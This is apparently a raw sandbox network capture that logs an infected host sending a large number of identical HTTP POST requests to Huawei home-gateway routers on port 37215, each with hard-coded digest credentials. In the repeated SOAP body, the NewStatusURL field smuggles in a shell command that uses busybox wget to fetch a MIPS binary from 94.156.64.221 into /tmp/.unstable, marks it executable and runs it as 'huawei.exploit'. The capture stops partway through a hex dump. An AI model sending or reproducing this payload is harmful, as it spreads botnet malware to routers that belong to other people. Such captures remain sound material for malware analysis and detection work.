                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    375192.168.2.234957441.37.164.2637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.258739948 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    376192.168.2.2339256197.235.98.18837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.258790970 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    377192.168.2.2334116197.227.44.10337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259083986 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    378192.168.2.2353256156.182.240.8137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259124994 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    379192.168.2.2357288197.45.25.8537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259197950 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    380192.168.2.2334126197.16.225.5137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259243011 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    381192.168.2.2344494156.41.49.18737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259280920 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    382192.168.2.2346300197.159.67.19137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259393930 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    383192.168.2.233452641.179.125.337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259624958 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    384192.168.2.2353642197.239.183.14337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.259666920 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 